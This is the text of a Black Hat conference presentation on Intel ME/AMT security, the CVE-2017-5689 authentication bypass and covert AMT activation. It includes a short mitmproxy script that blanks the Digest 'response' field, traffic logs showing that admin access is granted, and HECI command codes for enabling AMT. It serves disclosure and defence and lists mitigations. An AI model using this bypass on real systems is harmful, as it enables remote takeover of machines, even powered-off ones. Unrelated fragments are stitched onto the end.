INTEL AMT. STEALTH BREAKTHROUGH - Black Hat
INTEL AMT. STEALTH BREAKTHROUGHDmitriy Evdokimov, CTO EmbediAlexander Ermolov, Security researcher EmbediMaksim Malyutin, Security researcher Embedi
About usDmitriy EvdokimovCTO of Embedid.evdokimov@embedi.com @evdokimovdsAlexander Ermolovresearcher, reverse engineer, and information security experta.ermolov@embedi.com @flothroneMaksim Malyutinprogrammer who has occasionally ended up dealing with information securitym.malyutin@embedi.com @jesusfailed2
Real-time Q&AAsk us in twitter live, during the BlackHat session!Just use #askaboutintelamt hashtag in your question intwitter, and we will answer you at once!3
Agenda1. Introduction to Intel 64 systemarchitecture2. Intel ME/AMT architecture overview3. Unauthorized remote access to Intel AMTsystem4. Spread out5. Full attack scenario6. Conclusions4
Introduction to Intel 64 system architecture
System architecture overviewThe best known execution environments: Intel CPU Intel MEUEFI BIOS and Intel ME firmware(and a few other blobs) are system firmwarestored on the common SPI flash memory.6
System firmware7
Execution privileges8
Intel ME/AMT architecture
Intel ME architectureIntel ME is based on the MCU with ROM and SRAM.The most privileged and hidden execution environment: a runtime memory in DRAM, hidden from CPU full access to DRAM working even when CPU is in S5 (system shutdown) out-of-band (OOB) access to network interface undocumented communication protocol (MEI)AMD have a similar technology presented in 2013 — the PlatformSecurity Processor (PSP).10
Intel ME presenceIntel ME is integrated into: Q-type chipsets since 960 series (2006)o Intel ME 2.x - 5.x PCHAny chipset since 5 series (2010)o Intel ME 6.x - 11.xo Intel TXE 1.x - 3.xo Intel SPS 1.x - 4.xIts name and firmware implementation is specific to a platform type: Desktop/LaptopIntel Management Engine (ME) ServerIntel Server Platform Services (SPS) MobileIntel Trusted Execution Engine (TXE)11ME/AMT version5 series chipsetME 6.x (AMT 6.x)6 series chipsetME 7.x (AMT 7.x)7 series chipsetME 8.x (AMT 8.x)8 series chipsetME 9.x (AMT 9.x)9 series chipsetME 9.5.x/10x(AMT 9.5.x/10x )100 series chipset200 series chipsetME 11.x(AMT 11.x)
Intel ME RE problemsUnknown ME ROM contents on production systemsME ROM images can be found inside Intel ME firmware pre-production debug images(used for debug ROM bypass capability)Code is partially compressed with Huffman, but the dictionary is unknownThere is a reconstructed dictionary for ME 6.x - 10.x firmware (see unhuffme)Undocumented MEI communication protocolSome details are already reconstructed (see me heci.py)Inaccessible ME UMANo method to disable Intel MEBut there are ways to cut out unnecessary firmware components (see me cleaner.py)12
Reversing Intel MEme unpack.pyparse Intel ME firmware images and extract all partitions/modulesme util.pysend commands to Intel ME through HECIIntelmetoolcheck Intel ME status through HECIunhuffmeunpack Huffman-compressed modules from Intel ME firmware image 6.x – 10.xMEAnalyzera tool to analyze Intel ME firmware imagesunME11unpack some Huffman-compressed modules from Intel ME firmware 11.x13
Useful links “Rootkit in your laptop”, Igor Skochinsky "Intel ME: The Way of the Static Analysis", Dmitry Sklyarov A. Kumar, «Active Platform Management Demystified: Unleashing the Power of Intel VPro (TM) Technology",2009, Intel Press. Xiaoyu Ruan, «Platform Embedded Security Technology Revealed: Safeguarding the Future of Computing withIntel Embedded Security and Management Engine", 2014, APress.14
Intel ME firmware componentsThere are main firmware components: bringup module kernel drivers and services (to support timers, network, heci, )and the applications, that implements different Intel technologies: PTT AMT .Depending on the technologies applied, the firmware types are: Ignition firmware (ME 6.x only) - the minimal contents 1.5MB firmware - not full modules contents 5MB firmware - full firmware contents15
Intel AMT ArchitectureIntel AMT is an application inside Intel ME firmware.Intel AMT features: Web-Interface SOL IDE-R KVMIt is a part of the “vPro” brand, so it is officially supportedon the vPro-marked systems. Usually these systems have Q-typechipsets.Access Control List (ACL) ManagementAccess Monitor**Agent PresenceAlarm ClockBoot ControlCertificate ManagementDiscovery*Event ManagerHardware Assets**KVM Configuration**Network AdministrationPowerPower Packages**Redirection (SOL and USB-R)Remote AccessStorage**Storage File System*System DefenseTime SynchronizationUser Consent*Wireless* Posible interesting for attacker** Intresting for attacker16
Intel AMT AccessIntel AMT features can be accessed via a networkor a local interfaceIntel AMT has two types of interfaces: network interfaces (Intel AMTReleases 2.5, 2.6, 4.0, and 6.0 and later releases support a wireless,along with a wired, network interface) and a local interface.TCP/UDP messages addressed to certain registered ports are routedto Intel AMT when those ports are enabled. Messages receivedon a wired LAN interface go directly to Intel AMT.Local applications can communicate with the Intel ME the same waynetwork applications do: WS-Management over SOAP over HTTPThis could be done using the Local Manageability Service.LMS).17
Intel AMT network Ports5900 – AMT VNC-server without encryption;16992 – AMT web-server, HTTP protocol;16993 – AMT web-server, HTTPS protocol;16994 – AMT redirection for SOL, IDE-R, KVM without encryption;16995 – AMT redirection for SOL, IDE-R, KVM with TLS.Intel AMT authentication options: Digest KerberosAMT Implementation and Reference Guide - Manageability Ports18
Unauthorized remote access to Intel AMT system
Intel AMT logon pageWhen accessed through a regular web-browser Intel AMT redirects us to a logon page and challengeswith a password.20
Digest Authentication in Intel AMTAs for RFC 2617, the first time the client requests the document, no Authorization header field is sent,so the server responds with 401 Unauthorized: mitmdump -p 8080 -ddProxy server listening at http://0.0.0.0:8080127.0.0.1:50186: clientconnect GET http://192.168.1.1:16992/index.htmHost: 192.168.1.1:16992User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml xml,application/xml;q 0.9,*/*;q 0.8Accept-Language: en-US,en;q 0.5Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1 401 Unauthorized 689bWWW-Authenticate: Digest realm "Digest:C8090000000000000000000000000000",nonce " 9GoAAZEAACYo Ka4uJ0dCwoKCxAtTP2",stale "false",qop "auth"Content-Type: text/htmlServer: Intel(R) Active Management Technology 9.0.30Content-Length: 689Connection: close127.0.0.1:50186: clientdisconnect21
Digest Authentication in Intel AMTWhen given a username and password, the client responds with a new request, including the Authorization headerfield:.127.0.0.1:50190: clientconnect GET http://192.168.1.1:16992/index.htmHost: 192.168.1.1:16992User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml xml,application/xml;q 0.9,*/*;q 0.8Accept-Language: en-US,en;q 0.5Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1Authorization: Digest username "admin", realm "Digest:C8090000000000000000000000000000",nonce "JOKoAAdFAAApQD4w/l 88v4fscE6y2Ke", uri "/index.htm", response "7a8df4aa68a83ba59855d7a433522cf7", qop auth,nc 00000001, cnonce "6e8da33dda6b05d8" 200 OK 2.42kDate: Wed, 5 Jul 2017 20:07:21 GMTServer: Intel(R) Active Management Technology 9.0.30Content-Type: text/htmlTransfer-Encoding: chunkedCache-Control: no cacheExpires: Thu, 26 Oct 1995 00:00:00 GMT22
Digest Authentication in Intel AMTNote the name of the fields sent in the Authorization Headers. These strings will help us to pin-pointthe auth-related functionality in the actual ME firmware.127.0.0.1:50190: clientconnect GET http://192.168.1.1:16992/index.htmHost: 192.168.1.1:16992User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml xml,application/xml;q 0.9,*/*;q 0.8Accept-Language: en-US,en;q 0.5Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1Authorization: Digest username "admin", realm "Digest:C8090000000000000000000000000000",nonce "JOKoAAdFAAApQD4w/l 88v4fscE6y2Ke", uri "/index.htm", response "7a8df4aa68a83ba59855d7a433522cf7", qop auth,nc 00000001, cnonce "6e8da33dda6b05d8" 200 OK 2.42kDate: Wed, 5 Jul 2017 20:07:21 GMTServer: Intel(R) Active Management Technology 9.0.30Content-Type: text/htmlTransfer-Encoding: chunkedCache-Control: no cacheExpires: Thu, 26 Oct 1995 00:00:00 GMT23
Reversing web-serverProbably the easiest way to start digging into ME firmware prior to 10.x would be like: git clone https://github.com/embedi/meloader.gitcd meloaderln -s meloader.py /your-ida-place/loadersln -s meloader /your-ida-place/loadersidaq 9.0.30.1482 5MB PRD RGN.bin24
Reversing web-server which will result in:25
Reversing web-serverQuick search to “cnonce” string yields this:26
Reversing web-serverLet’s now look closer at the actual code of NETSTACK CODE 20431E74() subroutine:.; NETSTACK CODE:20431ED4addmovmovaddaddblcmpbneThe part where the call to strncmp() occurs seemsmost interesting here:r13, sp, 0x7Cr0, r17r1, r18r2, r14, (aResponse 0 - aUsername) # "response"r3, r13, 0x24# R3 SP 0xA0 &responseNETSTACK AuthGetValuer0, 0error/* NETSTACK CODE:20431FC8 */if(strncmp(computed response, response.value,response.length)){goto error;}return 0;.; NETSTACK CODE:20431FC8ldr1, [sp,0x10C user response]movr0, r13# computed responseldr2, [sp,0xA4]# response.lengthblRAPI strncmpcmpr0, 0bneerrormovr0, 0# zero means success!addsp, sp, 0x108bRAPI 20000DA4# retGiven an empty string the strncmp() evaluates tozero thus accepting and an empty response as avalid one!27
10 LOC for victoryOnce again we will use a mitmproxy tool, but armed with a script that blanks the “response” fieldof Authorization header: cat blank auth response.pyimport redef start():return BlankAuthResponse()class BlankAuthResponse:RESPONSE RE re.compile('(response ".*?")', flags re.DOTALL)def request(self, flow):if flow.request.port in (16992, 16993):if 'Authorization' in zation'] \self.RESPONSE RE.sub('response ""', flow.request.headers['Authorization'])28
Local proxy script Intel AMTLocal proxy, armed with the above-mentioned script, and try to access the Intel AMT through this proxy using anobviously incorrect password.29
Local proxy script Intel AMTAs in the previous case no Authorization header field is sent, so the server responds with 401 Unauthorized: mitmdump -p 8080 -dd --no-http2 -s blank auth response.pyProxy server listening at http://0.0.0.0:8080 GET http://192.168.1.1:16992/index.htmHost: 192.168.1.1:16992User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml xml,application/xml;q 0.9,*/*;q 0.8Accept-Language: en-US,en;q 0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.1:16992/logon.htmConnection: keep-aliveUpgrade-Insecure-Requests: 1 401 Unauthorized 689bWWW-Authenticate: Digest realm "Digest:C8090000000000000000000000000000",nonce "efoAAQdGAADhoXdHX8P3u0jsI18jLaZN",stale "false",qop "auth"Content-Type: text/htmlServer: Intel(R) Active Management Technology 9.0.30Content-Length: 689Connection: close30
Local proxy script Intel AMTBut then 200 OK, yay! Note an empty value for the “response” field.127.0.0.1:50856: clientconnect GET http://192.168.1.1:16992/index.htmHost: 192.168.1.1:16992User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml xml,application/xml;q 0.9,*/*;q 0.8Accept-Language: en-US,en;q 0.5Accept-Encoding: gzip, deflateReferer: : Digest username "admin", realm "Digest:C8090000000000000000000000000000",nonce "cZwGAQdHAACp1IXkfN PXVbcKduiJY6i", uri "/index.htm", response "", qop auth, nc 00000001,cnonce "33366b65c3dc402b"Connection: keep-aliveUpgrade-Insecure-Requests: 1Cache-Control: max-age 0 200 OK 2.42kDate: Wed, 5 Jul 2017 21:49:31 GMTServer: Intel(R) Active Management Technology 9.0.30Content-Type: text/htmlTransfer-Encoding: chunkedCache-Control: no cacheExpires: Thu, 26 Oct 1995 00:00:00 GMT31
Local proxy script Intel AMTEvery AMT feature is now available for an attacker as if he knows the admin password.32
Intel bug bounty program33
CVE-2017-5689 Intel SA 00075 Security Advisory US-CERT34
Exploitation of CVE-2017-5689There is a vulnerability that allows attackers to log as “admin” userin the AMT. The only thing needed is open 16992/16993 port Doesn't depend on software Turned off devices may be attacked as well Some systems are accessible through the Internet Attackers can use all the Intel AMT capabilities for their own goodThere are 2 attack methods: Local (by using the LSM service) Remote (via the open port)35
Impact of CVE-2017-5689Shodan "Intel AMT Report 02-05-2017"36
Intel AMT bug & Industrial PCSecurity advisor: SSA-874235: Intel Vulnerability in Siemens Industrial Products37
Demo
After newsAfter newsTenable "Rediscovering the Intel AMT Vulnerability —No PoC, No Patch, No Problem!"After detailsMany community tools: Nmap scriptMetasploit moduleAMT status checker for LinuxTool to disable Intel AMT on WindowsDetection Script for CVE-2017-5689Intel AMT honeypot 1Intel AMT honeypot 239
MitigationsIntel: INTEL-SA-00075 Detection and Mitigation Tool INTEL-SA-00075 Mitigation Guide40
Spread out
The “vPro” can make a difference Cheap Different BIOS Expensive non-vPro vPro Intel Z/H/B/Ptype chipsetSimilar Intel MEfirmware versionsand code Intel Q-typechipsets42
The “vPro” can make a difference Cheap non-vPro Intel Z/H/B/Ptype chipset Different BIOSIntel MBEx module Similar Intel MEfirmware versionsand codeAMT everywhere** — 5MB firmware43 Expensive vPro Intel Q-typechipsets
Intel ME stateWhat can be done through HECI?Intel MEI(HECI) can also be used to check thestate of Intel ME subsytem: FWSTATUS registers; Status request to MKHI; Intel PT 44
Intel MEI (HECI)The HECI is used to configure Intel AMT.HECI PCI CFG points to HECI MMIO, where the circular bufferwindow is mapped to send messages to Intel ME and getresponses.45
Intel MEI (HECI)HECI is based on DCMI-HI protocol.There are clients (code modules) that use HECI inside Intel ME firmware. To connect them you need to knowGUIDs of the client.Known GUIDs 0ff65814c46
Intel MEI (HECI)The message to Intel ME should contain the command description (specifies the action required from Intel ME tomake). The command is described by the groupID/command field.To send the message through the HECI you need to1. Connect to the client using the GUID2. Send a message using the following gned};intintintintintgroupID;// the AMTHI client code, 0x12command;// command codeisResponse;reserved;result;3. Get the acknowledge message47
Intel MEI (HECI)MEI- AMTHI transactions required to activate the AMTCommand namegroupIDCommand codeAck codeDescriptionAMT INITgroupID 0x12command 0x05ack 0x85Network access initializationAMT SET PWDgroupID 0x12command 0x09ack 0x89Set password for admin userAMT SET IVP4groupID 0x12command 0x0Cack 0x8CSet IP addressAttention! Non-vPro systems has no user interface for disabling Intel AMT!MEI- AMTHI transactions required to deactivate the AMTCommand namegroupIDCommand codeAck codeDescriptionAMT UNPROVISIONgroupID 0x12command 0x06ack 0x86AMT deactivation (need reboot)48
AMTactivatorAMTactivator:Systems tested:1. mei.sys - 32-bit kernel driver to work with MEI2. mei64.sys - 64-bit kernel driver to work with MEI3. AMTactivator.exe - the applicationThe workflow:1. Find the MEI device in the PCI CFG and get thebase address if the MEI MMIO.2. Use the MEI MMIO to sendactivation/configuration commands to Intel MEthat.Code: https://github.com/embedi/meitoolsIntel ME versionSystem and chipsetCPU7Intel DQ67SW (vPro), Intel Q67Intel Core i7-2600 (vPro)8Gigabyte GA-H77-D3H (nonvPro), Intel H77Intel Core i7-3770 (vPro)9Gigabyte GA-Q87N (vPro), IntelQ87Intel Core i3-4300 (nonvPro)Intel Core i5-4590 (vPro)Gigabyte GA-H97-D3H (nonvPro), Intel H9749Intel Core i5-4590 (vPro)
Demo 2
Current limitations of AMTactivator Only 6 - 9 Intel desktop chipset series are supported. Successful AMT activation on 100/200 series chipsetsnot yet achieved. Intel AMT configures to Standard Manageability mode (without the KVM feature) if your CPU is non-vPro. Intel AMT activation is possible on the systems with Intel ME 5MB firmware (1,5MB firmware doesn’t havesuch functionality). Windows only, can be ported to Linux. Uses our kernel drivers for its operation. Can be implemented to work with Intel MEI driver as well.51
Malware & Intel AMT 2015, "How Many Million BIOSes Would you Like to Infect?", XenoKovah & Corey Kallenbergo Section 6.2 “Network command & control of firmware-levelmalware”o SMM malware Just writing data to a serial port2017, "PLATINUM continues to evolve, find ways to maintaininvisibility", Windows Defender Advanced Threat Hunting Teamo Use Intel AMT Serial-over-LAN (SOL) channel for communicationo Use AMT Technology SDK’s Redirection Library API (imrsdk.dll) IMR SOLSendText()/IMR SOLReceiveText() functions52
Mitigations Periodically check if your system doesn’t have Intel AMT enabled (network ports)o But an attacker could periodically change the state of Intel AMT (enable/disable) Uninstall Intel MEI drivero But an attacker could use its own driver to access MEI Use the network firewall to block any external requests to Intel AMT known network portso Not useful for companies that use Intel AMT in their network infrastructure Use me cleaner to cut out the unnecessary functionality from Intel ME firmware of your systemo Could brick your system (you will need a hardware programmer to recover)53
Spread Out 2
1.5MB FW to 5MB FWMethods: using the SPI flash programmer (if flash memory regions are locked) software way (if flash memory regions are not locked)o through kernel drivero using BIOS vulnerabilitiesAn obvious limitation: the new FW should fit the SPI flash sizeSystems with 6 - 9 series chipsets *system won't boot (resets during the early phases of boot process)Systems with 100 series chipsets *system boots* — work in progress55
What could an attacker do?Case 1: The system uses outdated Intel AMTIntel chipsetseriesCase 1Case 2Case 36 ?Case 2: The system doesn’t use Intel AMT7 ?ActivatorAMT8 ?9 ?100 ? 200 ?CVE-2017-5689Case 3: There is no Intel AMT in the systemsAdd Intel AMT functionality by upgrading the 1.5MB firmware to 5MBfirmware? - not testedIf you want to give us a hand in testing, please contact us56
Attack scenarios57
Takeaways1.2.3.4.ring-3 firmware (Intel ME/AMT) has security issues.ring-3 hardware (Intel ME/AMT) has undocumented features.New stealth infecting technique of computer system.Legit functionality for illegit actions.One should get used to the idea that attackers’ possibilities and Intel AMT capabilities are the same thing.Specifically, they can use Intel AMT functionality to achieve their malicious purposes.58
THANK YOU FOR YOU ATTENTION!CONTACTS:Website: embedi.comTelephone: 1 5103232636Email: info@embedi.comAddress: 2001 Addison Street Berkeley, California 94704
Intel ME is integrated into: Q-type chipsets since 960 series (2006) o Intel ME 2.x - 5.x Any chipset since 5 series (2010) o Intel ME 6.x - 11.x o Intel TXE 1.x - 3.x o Intel SPS 1.x - 4.x Its name and firmware implementation is specific to a platform type: Desktop/Laptop
ASF is a standardized corporate assets management technology. The Intel ICH9 platform supports ASF specification 2.0. l Intel AMT ² Intel Active Management Technology. Intel AMT is an improved corporate assets management technology. Intel ICH9 platform supports Intel AMT 2.6. The table below explains these options. Management Feature Select Option
Books and Articles About Stealth Antennas 1. Small Antennas for Small Spaces (ARRL) 2. Stealth Antennas (RSGB) 3. Smartuners for Stealth Antennas (SGC) 4. Stealth Kit (SGC) 5. Stealth Amateur Radio: Operate From Anywhere 6. The ARRL Antenna Book for Radio Communications (ARRL) 7. HF Antennas for Limited Sp
admin with no password on all vPro systems since 2010 2017 AMT 6.0 Remote KVM support added here 2010 AMT 4.0 Over-the-internet provisioning capabilities 2008 AMT 2.5 Wireless network support added here 2007 AMT 1.0 First version of Intel AMT available in Core 2 Duo vPro, included embedded web server and fw u
Intel C Compiler Intel Fortran Compiler Intel Distribution for Python* Intel Math Kernel Library Intel Integrated Performance Primitives Intel Threading Building Blocks Intel Data Analytics Acceleration Library Included in Composer Edition SCALE Intel MPI Library Intel Trace Analyze
Intel Manageability Commander (Intel MC) is a lightweight console used to connect with and utilize the features of Intel Active Management Technology (Intel AMT). Through this software, users will be able to connect to activated Intel AMT devices and
Stealth exits are the equivalent of stop-losses and take-profits (s/l and t/p). They close individual open trades when a price is hit, or when the trade's net profit reaches a threshold (e.g. USD 50 profit or USD 100 loss). 3.1 Creating stealth exits You create new stealth exits on the "Exits" tab, using the "New stealth exit" button.
Document Number: 337029 -009 Intel RealSenseTM Product Family D400 Series Datasheet Intel RealSense Vision Processor D4, Intel RealSense Vision Processor D4 Board, Intel RealSense Vision Processor D4 Board V2, Intel RealSense Vision Processor D4 Board V3, Intel RealSense Depth Module D400, Intel RealSense Depth Module D410, Intel
A Curriculum Guide to George’s Secret Key to the Universe By Lucy & Stephen Hawking About the Book When George’s pet pig breaks through the fence into the yard next door, George meets his new neighbors—Annie and her scientist father, Eric—and discovers a secret key that opens up a whole new way of looking at the world from outer space! For Eric has the world’s most advanced computer .
